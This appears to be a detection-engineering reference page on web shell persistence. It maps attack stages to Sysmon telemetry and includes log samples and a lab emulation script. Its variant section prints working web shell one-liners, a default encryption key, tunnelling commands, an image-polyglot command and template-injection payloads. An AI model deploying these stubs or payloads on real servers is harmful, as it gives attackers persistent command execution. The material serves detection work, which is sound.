Web Shell Persistence

Persistence Initial Access Execution T1505.003 T1190 T1059.004 Detection difficulty: MEDIUM Prevalence: HIGH

Adversaries plant web-accessible scripts (web shells) on compromised servers to maintain persistent command execution via HTTP/HTTPS. Web shells are deployed in virtually every major web-facing compromise, appearing in 35% of Q4 2024 IR incidents (Cisco Talos) and serving as the primary persistence mechanism in ProxyLogon, ProxyShell, MOVEit, Barracuda ESG, and Ivanti zero-day campaigns. Despite diversity in language (PHP/ASP.NET/JSP/Python), encoding (base64, XOR, gzinflate, multi-layer), and evasion technique (polyglot files, fileless IIS modules, steganography), the chokepoint is invariant: the web server process must execute attacker-controlled OS commands by spawning a child interpreter, and that parent-child relationship is always kernel-observable regardless of obfuscation. The ShellForge paper (arXiv 2601.22182) demonstrated that adversarially generated webshells achieve 93.9% evasion against VirusTotal commercial engines, validating that behavioral detection of process creation is essential over file-content scanning.

By @iimp0ster · Updated 2026-03-07 · View source YAML

Attack Chokepoints 3 invariant stages

Each stage is an invariant condition the attacker must satisfy, regardless of tool, variant, or threat actor. Detection at any stage breaks the chain.

1 Shell Deployment ▶

Prerequisites

Write access to a web-accessible directory on the target server (via file upload, path traversal, CVE exploitation, or CMS compromise)
OR ability to modify web server configuration (for IIS native module approach)
Web server must execute the shell's scripting language (PHP, ASP.NET, JSP, etc.)
HTTP/HTTPS access to the deployed shell from attacker infrastructure
Server must have OS command execution capability (not hardened to deny shell spawning)

Input Attacker has write access to web-accessible directory, module registry, or injectable input field

Chokepoint Must deploy executable code reachable by the web server. Options are a script file in the web root, a native DLL loaded as an IIS module, or an injection payload processed by a template engine

Observable Script-based: Sysmon EID 11 showing w3wp.exe/httpd/nginx writing .php/.aspx/.jsp to web root. Module-based: Sysmon EID 7 showing unusual DLL loaded by w3wp.exe or appcmd.exe install module. Injection-based: No file artifact. Detected at the execution stage.

Why unavoidable

The web server must be able to reach and execute the attacker's code. For file-based shells, the file must exist on disk. For IIS modules, the DLL must be loaded. For SSTI, the template engine must process the input. Each path produces a different artifact but all require server-side code execution.

Data Sources

Sysmon Event ID 11 (File Created)
IIS / Apache / Nginx access logs

View rule →

↓ Web shell file exists on the server

2 Shell Execution ▶

Input Web shell file exists on the server

Chokepoint An HTTP request to the shell URL causes the web server process to spawn a child OS command interpreter

Observable Sysmon EID 1 showing w3wp.exe / httpd / nginx spawning cmd.exe, powershell.exe, /bin/sh, /bin/bash, or python. This parent-child relationship is the invariant regardless of shell language or obfuscation.

Why unavoidable

The web shell must execute OS commands to be useful. The OS requires a process to run those commands. That process creation, with a web server parent, is always observable.

Data Sources

Sysmon Event ID 1 (Process Creation)
Windows Security Event ID 4688 (Process Creation)

View rule →

↓ Child interpreter is running with web server privileges

3 Command Execution / Exfiltration ▶

Input Child interpreter is running with web server privileges

Chokepoint The spawned interpreter executes reconnaissance, lateral movement, or data exfiltration commands

Observable Command-line content from the child process (whoami, ipconfig, net user, certutil downloads). Network connections from the child process to internal or external targets.

Why unavoidable

The entire purpose of a web shell is command execution. The commands must run in a process, and that process generates telemetry.

Data Sources

Sysmon Event ID 1 (Process Creation with CommandLine)
Sysmon Event ID 3 (Network Connection)

View rule →

Variations 11 variants tracked

Tools and methods that exploit this chokepoint. The list grows. The chokepoint doesn't change.

China Chopper 2013 Active ▶

Minimal two-component design: a one-line server-side stub (often <4KB) and a separate attacker-controlled client. Supports PHP, ASP, ASP.NET, and JSP. Extremely small footprint makes file-size-based detection ineffective. Used across the full threat actor spectrum from APT groups to commodity attackers; still actively deployed in 2024-2025 campaigns.

Command / artifacts

Minimal <4KB server-side stub. Command execution via eval() of POST parameter. Client-side GUI tool manages connections. Supports PHP, ASP, ASP.NET, JSP.

# Server stub (ASP.NET — one line):
<%@ Page Language="Jscript" %><%eval(Request.Item["password"],"unsafe");%>
# Server stub (PHP — one line):
<?php @eval($_POST['password']);?>
# Client sends POST with command in password parameter

Sysmon EID 1: w3wp.exe spawning cmd.exe or powershell.exe
Web logs: POST requests to small .aspx/.php files with base64 body
Sysmon EID 11: Small script file written to web root

Same chokepoint: Script written to web root → HTTP POST to shell → w3wp.exe spawns cmd.exe → command execution

Source: cloud.google.com →

Godzilla 2020-Q4 Active ▶

Created by BeichenDream; requires both a password AND encryption key for C2 communication, providing dual-layer authentication that prevents accidental discovery by other threat actors. Supports ASP.NET, JSP, and PHP. Actively tracked by HC3 in November 2024 healthcare sector campaigns; more sophisticated authentication model than China Chopper.

Command / artifacts

Dual-layer authentication (password + encryption key) prevents accidental discovery. AES-encrypted C2 traffic. Created by BeichenDream. Tracked in healthcare by HC3 (Nov 2024).

# Server stub requires password AND encryption key:
# ASP.NET variant with AES-encrypted command execution:
string key = "3c6e0b8a9c15224a";
// AES-encrypted C2 traffic with dual-key auth

Sysmon EID 1: w3wp.exe spawning cmd.exe (POST-triggered)
Web logs: Encrypted POST bodies to .aspx/.jsp files
Network: AES-encrypted HTTP traffic to single endpoint

Same chokepoint: Encrypted shell deployed → AES-encrypted POST → w3wp.exe spawns interpreter → encrypted response

Source: github.com →

Behinder (Ice Scorpion) 2020-Q1 Active ▶

Publicly available and actively maintained (GitHub user rebeyond); uses encryption-based C2 communication and randomizes User-Agent strings to evade network and log analysis. Can load and execute compiled payloads in addition to script commands. Supports ASP.NET, JSP, PHP. Particularly effective against network-based detection due to encrypted traffic.

Command / artifacts

AES-encrypted C2 traffic using hardcoded pre-shared key. Supports PHP, JSP, ASP.NET. Client is a Java JAR. Default key is first 16 chars of MD5("rebeyond").

# PHP server stub (AES-encrypted C2):
<?php @error_reporting(0);session_start();$key="e45e329feb5d925b";$_SESSION['k']=$key;...eval()...?>
# Default AES key: e45e329feb5d925b (MD5 of "rebeyond", first 16 chars)
# Client sends AES-encrypted commands

Sysmon EID 1: w3wp.exe / httpd spawning cmd.exe or powershell.exe
Web logs: POST requests with AES-encrypted bodies (no plaintext visible)
Network: Randomized User-Agent strings per request from same source

Same chokepoint: Shell written to web root → AES-encrypted POST → w3wp.exe spawns interpreter → encrypted response

Source: github.com →

AntSword 2019 Active ▶

Modular client-server webshell framework; remarkably similar architecture to China Chopper but with improved extensibility. Open source on GitHub. Actively observed in targeted campaigns through 2024-2025.

Command / artifacts

Modular client-server framework, open source. Architecturally similar to China Chopper with improved extensibility and plugin system. Electron-based client.

# PHP server stub (minimal):
<?php @eval($_POST['ant']);?>
# Or obfuscated: <?php $V='ant';$$V=@$_POST[$V];eval($$V);?>
# Client sends base64-encoded PHP in POST parameter

Sysmon EID 1: w3wp.exe / httpd spawning cmd.exe (POST-triggered)
Web logs: POST with base64 body to small script file

Same chokepoint: Script written to web root → POST with base64 payload → web server spawns cmd.exe

Source: github.com →

Neo-reGeorg / reGeorg 2017 Active ▶

HTTP tunnel/proxy webshell that forwards attacker traffic through the compromised server; commonly used for lateral movement once initial shell access is achieved. Neo-reGeorg is the actively maintained successor. Allows attackers to proxy traffic to internal network segments not directly reachable from the internet.

Command / artifacts

HTTP tunnel/proxy web shell for forwarding traffic through compromised server to internal networks. Neo-reGeorg is the maintained successor to reGeorg.

# HTTP tunnel — not for command execution but traffic proxying:
python3 neoreg.py generate -k <password>
python3 neoreg.py -k <password> -u http://target/tunnel.aspx -p 1080
# Creates SOCKS5 proxy on attacker localhost:1080

Web logs: High volume of POST requests to single ASPX/PHP file
Sysmon EID 3: w3wp.exe making connections to internal RFC1918 addresses

Same chokepoint: Tunnel shell deployed → HTTP POST traffic → web server proxies to internal network → lateral movement

Source: github.com →

LEMURLOOT (MOVEit) 2023-Q2 Active ▶

C# ASP.NET webshell deployed by CL0P (TA505) via MOVEit Transfer CVE-2023-34362 SQL injection zero-day (May 2023). Named human2.aspx to masquerade as a legitimate MOVEit file. Exfiltrated data from MOVEit databases and executed arbitrary commands. Approximately 130 organizations victimized within 10 days; represents the targeted appliance-specific webshell model deployed by ransomware operators.

Command / artifacts

Deployed by CL0P via MOVEit Transfer SQLi zero-day. Named human2.aspx to blend with legitimate human.aspx. 130+ organizations compromised in 10 days.

# human2.aspx — masquerades as legitimate MOVEit file
# Accepts commands via X-siLock-Comment header
# Deployed via CVE-2023-34362 SQLi zero-day

Sysmon EID 11: human2.aspx created in MOVEit web directory
Sysmon EID 1: w3wp.exe spawning cmd.exe after POST to human2.aspx
Web logs: Requests with X-siLock-Comment header containing commands
SQL logs: Anomalous queries from MOVEit application

Same chokepoint: SQLi writes human2.aspx → HTTP request with X-siLock-Comment → w3wp.exe → cmd.exe → data exfil

Source: www.cisa.gov →

GLASSTOKEN / BUSHWALK (Ivanti) 2024-Q1 Active ▶

Webshells deployed against Ivanti Connect Secure appliances via CVE-2023-46805 (auth bypass) and CVE-2024-21887 (command injection). GLASSTOKEN was the initial variant; BUSHWALK, LIGHTWIRE, and CHAINLINE were deployed post-mitigation bypass. Over 1,700 appliances compromised. Demonstrates the shift from web application webshells to network appliance webshells. Same parent-child execution pattern, different host OS environment.

Command / artifacts

Deployed via CVE-2024-21887 + CVE-2023-46805 on Ivanti Connect Secure. CISA AA24-060b. Shells use Perl/Python native to the appliance OS.

# BUSHWALK — Perl CGI on Ivanti Connect Secure:
# Deployed to /home/perl/DSLogConfig.pm
# GLASSTOKEN — Python CGI on Ivanti:
# Injected into legitimate Python CGI files
# Uses Ivanti's built-in Perl/Python environments

Ivanti logs: Anomalous CGI execution in /home/perl/ or /home/python/
File integrity: Modified .pm or .py files in Ivanti web directories

Same chokepoint: Exploit writes shell to Ivanti CGI path → HTTP request → Perl/Python interpreter executes → internal pivot

Source: www.cisa.gov →

SALTWATER / SEASPY (Barracuda ESG) 2023-Q2 Active ▶

Webshell-style implants deployed by UNC4841 (China-nexus) against Barracuda Email Security Gateway appliances via CVE-2023-2868 (remote command injection via TAR file). Exploited as zero-day from October 2022; disclosed May 2023. CISA mandated full appliance replacement; patches were insufficient. Demonstrates webshells surviving factory reset via firmware-level persistence on physical appliances.

Command / artifacts

Deployed by UNC4841 (China-nexus) via CVE-2023-2868. SALTWATER is a trojanized SMTP module. SEASPY is a passive backdoor. Both persist across firmware updates.

# SALTWATER — trojanized Barracuda SMTP daemon module
# SEASPY — passive backdoor monitoring port 25, activates on magic packet
# Both persist across firmware updates via modified /etc/init.d/

File integrity: Modified modules in Barracuda firmware directories
Network: Anomalous SMTP traffic patterns on port 25
Process: Unexpected child processes from Barracuda SMTP daemon

Same chokepoint: Exploit injects module into SMTP daemon → crafted SMTP command → daemon spawns shell → command execution

Source: cloud.google.com →

Fileless IIS Native Modules 2022-Q1 Active ▶

Malicious IIS native modules (.DLL) that act as request handlers, intercepting all HTTP traffic to the server. Documented by Microsoft in December 2022; avoids writing script files to web-accessible directories entirely. Detected via IIS module configuration review rather than file scanning. Same parent-child process relationship (w3wp.exe spawning cmd.exe) applies when commands are executed.

Command / artifacts

Documented by Microsoft (Dec 2022). Native C++ IIS modules run in-process with w3wp.exe; no child process for basic operations. Can intercept credentials from HTTP traffic.

# Installed as native IIS module (C++ DLL):
appcmd.exe install module /name:"MyModule" /image:"C:\path\to\malicious.dll"
# Or via web.config: <modules><add name="MyModule" .../></modules>
# No script file on disk — runs in-process with w3wp.exe

Sysmon EID 7: Unusual DLL loaded by w3wp.exe
IIS logs: appcmd.exe install module commands
Registry: New modules in HKLM\SOFTWARE\Microsoft\InetSrv\Modules

Same chokepoint: Malicious DLL installed as IIS module → runs in-process with w3wp.exe → intercepts HTTP traffic

Source: www.microsoft.com →

Polyglot / Steganographic Shells 2020-Q1 Active ▶

Webshell code embedded in valid image files (GIF89a header + PHP code) or hidden via steganography. Bypass file-type validation and content inspection. When the web server processes the file as a script, the embedded code executes. Primarily used to evade upload restrictions; once uploaded, execution behavior is identical to traditional webshells.

Command / artifacts

Shell code hidden inside valid image files that pass upload validation. PHP evaluates embedded code when the file is included by the application.

# PHP embedded in image EXIF metadata:
exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg
# Accessed via LFI: http://target/uploads/image.jpg?cmd=whoami

Sysmon EID 11: Image file uploaded to web root with PHP magic bytes
Web logs: GET/POST to image files with query parameters
Sysmon EID 1: httpd/php-fpm spawning cmd.exe after request to image

Same chokepoint: Polyglot image uploaded → HTTP request with parameters → PHP evaluates embedded code → command execution

Source: www.trustwave.com →

Server-Side Template Injection (SSTI) Webshells 2019 Active ▶

Injects malicious code into server-side template expressions (Jinja2, Freemarker, Velocity, Thymeleaf, JSP EL) to achieve RCE without uploading a dedicated shell file. The template engine becomes the execution vehicle. SAP NetWeaver JSP webshells (April 2025) demonstrated SSTI-based initial access at scale; no traditional shell file exists on disk to scan.

Command / artifacts

Exploits template engines to execute code without uploading a file. No persistent file on disk. The shell is the injection payload itself.

# Jinja2: {{config.__class__.__init__.__globals__['os'].popen('whoami').read()}}
# Twig: {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("whoami")}}
# FreeMarker: <#assign ex="freemarker.template.utility.Execute"?new()>${ex("whoami")}

Web logs: Template syntax in request parameters ({{ }}, <# >, etc.)
Sysmon EID 1: Web server spawning cmd.exe/sh after template rendering

Same chokepoint: Template injection in user input → template engine evaluates → web server spawns interpreter → command output

Source: portswigger.net →

Detection Strategy

Rules organized by the chokepoint stage they detect. Each stage has one or more rules at different maturity levels.

1 Shell Deployment

2 Shell Execution

3 Command Execution / Exfiltration

Raw Log Samples 4 samples

Real-world log events produced by this technique and which Sigma rules they trigger.

EID 11 Sysmon ASPX web shell file created in IIS web root by non-deployment process ▶

EventID: 11 (FileCreate) UtcTime: 2024-09-03 07:14:32.441 ProcessId: 4 Image: System TargetFilename: C:\inetpub\wwwroot\upload\cmd8473.aspx CreationUtcTime: 2024-09-03 07:14:32.441 # File created in web root with .aspx extension by SYSTEM/non-deployment process # Timestamp correlation: shell accessed via HTTP within 60 minutes of this event

EID 1 Sysmon cmd.exe spawned by w3wp.exe after HTTP request to the web shell ▶

EventID: 1 (Process Create) UtcTime: 2024-09-03 07:18:44.113 ProcessId: 7832 Image: C:\Windows\System32\cmd.exe CommandLine: cmd /c whoami CurrentDirectory: C:\Windows\system32\ ParentProcessId: 2840 ParentImage: C:\Windows\System32\inetsrv\w3wp.exe ParentCommandLine: c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" # w3wp.exe → cmd.exe is the canonical IIS web shell execution pattern # Research rule: any w3wp child; Hunt/Analyst rule: cmd.exe/powershell.exe child

EID 1 Sysmon PowerShell with encoded command spawned by w3wp.exe. Encoded web shell execution ▶

EventID: 1 (Process Create) UtcTime: 2024-09-03 07:19:02.774 ProcessId: 8104 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine: powershell.exe -NonInteractive -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA ParentProcessId: 2840 ParentImage: C:\Windows\System32\inetsrv\w3wp.exe # w3wp → powershell.exe with -enc flag = high-confidence Analyst rule signal

EID 3 Sysmon Outbound reverse shell / download connection from w3wp.exe child process ▶

EventID: 3 (NetworkConnect) UtcTime: 2024-09-03 07:19:04.882 ProcessId: 8104 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe User: IIS APPPOOL\DefaultAppPool Protocol: tcp Initiated: true SourceIp: 10.20.1.15 SourcePort: 52741 DestinationIp: 185.220.101.55 DestinationHostname: - DestinationPort: 4444 # w3wp child process making outbound TCP connection to non-RFC1918 IP on non-standard port

Emulation

ATT&CK: T1505.003 Simulates web shell file creation, interpreter spawn with recon commands, and outbound connection powershell ▶

⚠ Lab use only. Run in isolated lab VM only. Creates a text file (not executable) in a test web directory.

POWERSHELL

GitHub → Download

#Requires -Version 5.1
# MITRE ATT&CK: T1505.003 — Server Software Component: Web Shell
# Simulates web shell write to web root and subsequent command execution via HTTP.

[CmdletBinding()]
param(
    [string]$WebRoot        = (Join-Path $env:TEMP 'wwwroot-emulation'),
    [string]$ShellExtension = '.aspx',
    [switch]$CleanupOnly
)

Set-StrictMode -Version Latest
$ErrorActionPreference = 'Continue'

$ShellName   = "cmd$(Get-Random -Maximum 9999)$ShellExtension"
$ShellPath   = Join-Path $WebRoot $ShellName
$C2Endpoint  = 'https://example.com'

function Write-Step ([string]$Msg) { Write-Host "[*] $Msg" -ForegroundColor Cyan }
function Write-Ok   ([string]$Msg) { Write-Host "[+] $Msg" -ForegroundColor Green }
function Write-Warn ([string]$Msg) { Write-Host "[!] $Msg" -ForegroundColor Yellow }

function Remove-Artefacts {
    if (Test-Path $ShellPath)  { Remove-Item $ShellPath  -Force -ErrorAction SilentlyContinue }
    if (Test-Path $WebRoot -and (Get-ChildItem $WebRoot -ErrorAction SilentlyContinue).Count -eq 0) {
        Remove-Item $WebRoot -Force -ErrorAction SilentlyContinue
    }
    Write-Ok "Artefacts removed"
}

if ($CleanupOnly) { Remove-Artefacts; exit 0 }

Write-Host ""
Write-Host "=== Web Shell Emulation ===" -ForegroundColor Magenta
Write-Host "    T1505.003 | Detection Chokepoints Project" -ForegroundColor DarkGray
Write-Host ""

Write-Step "Step 1/3 — Creating web shell file in web-accessible directory"
Write-Verbose "  Path: $ShellPath"

# Ensure web root exists
if (-not (Test-Path $WebRoot)) {
    New-Item -ItemType Directory -Path $WebRoot -Force | Out-Null
    Write-Ok "Created test web root: $WebRoot"
}

# Write a safe marker file (NOT an executable web shell — just text content)
$ShellContent = @"
<%@ Page Language="C#" %>
<!-- Web Shell Emulation Marker — NOT executable, for detection testing only -->
<!-- Created by Detection Chokepoints emulation script -->
<!-- T1505.003 — File created at: $(Get-Date -Format 'yyyy-MM-dd HH:mm:ss') -->
<% Response.Write("Detection test"); %>
"@
Set-Content -Path $ShellPath -Value $ShellContent -Encoding UTF8
Write-Ok "Web shell marker created: $ShellPath"
Write-Ok "Sysmon EID 11 generated — extension=$ShellExtension, path contains web root pattern"

Start-Sleep -Milliseconds 400

Write-Step "Step 2/3 — Simulating web server → cmd.exe execution chain"
Write-Verbose "  Real pattern: w3wp.exe → cmd.exe (web server spawns interpreter after HTTP request)"
Write-Verbose "  Simulated:    powershell.exe → cmd.exe (same child process, different parent)"
Write-Verbose "  Note: Hunt/Analyst rules check ParentImage=w3wp.exe specifically"
Write-Verbose "  For w3wp parent: deploy in IIS and access via HTTP (see below)"

# Run recon commands that web shells execute post-exploitation
$reconCommands = @(
    'whoami',
    'hostname',
    'ipconfig /all',
    'net user',
    'net localgroup administrators'
)

foreach ($cmd in $reconCommands) {
    $result = cmd.exe /c $cmd 2>&1 | Select-Object -First 3
    Write-Ok "cmd /c $cmd`: $($result[0])"
}

# Also run an encoded command (Analyst rule trigger)
$encodedPayload = [Convert]::ToBase64String(
    [System.Text.Encoding]::Unicode.GetBytes('Get-ChildItem C:\inetpub\wwwroot -ErrorAction SilentlyContinue')
)
powershell.exe -NonInteractive -NoProfile -EncodedCommand $encodedPayload 2>&1 | Out-Null
Write-Ok "Encoded command executed from cmd context — Analyst rule EID 1 pattern matched"

Start-Sleep -Milliseconds 400

Write-Step "Step 3/3 — Outbound HTTP connection from spawned interpreter"
Write-Verbose "  In real scenario: w3wp.exe child makes outbound connection to C2"

try {
    $resp = Invoke-WebRequest -Uri $C2Endpoint -Method HEAD -TimeoutSec 10 `
        -UseBasicParsing -ErrorAction Stop
    Write-Ok "Outbound connection (HTTP $($resp.StatusCode)) from interpreter — Sysmon EID 3 generated"
} catch {
    Write-Warn "Network request failed (EID 3 may still have fired for the TCP attempt): $_"
}

Write-Host ""
Write-Step "Cleaning up artefacts"
Remove-Artefacts

Write-Host ""
Write-Host "=== Emulation Complete ===" -ForegroundColor Magenta
Write-Host ""
Write-Host "Expected detections:" -ForegroundColor White
Write-Host "  [Research]  Sysmon EID 1 — any child process of web server"                               -ForegroundColor DarkCyan
Write-Host "  [Hunt]      EID 11 ($ShellExtension in web path) + EID 1 (cmd.exe/powershell.exe child)"  -ForegroundColor DarkYellow
Write-Host "  [Analyst]   EID 11 (web shell ext) + EID 1 (-enc or recon cmd) + EID 3 (outbound)"       -ForegroundColor DarkGreen
Write-Host ""
Write-Host "For w3wp.exe parent chain (IIS-specific Hunt/Analyst rules):" -ForegroundColor DarkGray
Write-Host "  1. Install IIS: Enable-WindowsOptionalFeature -Online -FeatureName IIS-WebServer"
Write-Host "  2. Copy shell marker to C:\inetpub\wwwroot\$ShellName"
Write-Host "  3. For ASPX execution: rename to .aspx, enable ASP.NET in IIS"
Write-Host "  4. Use a benign ASPX that runs: Response.Write(new System.Diagnostics.Process(){...}.StandardOutput.ReadToEnd())"
Write-Host "  5. HTTP request to http://localhost/$ShellName generates authentic w3wp.exe → cmd.exe"
Write-Host ""
Write-Host "For Linux (Apache/nginx) parent chain:" -ForegroundColor DarkGray
Write-Host "  Use companion emulate.sh (spawn bash from httpd/nginx context via PHP)"
Write-Host ""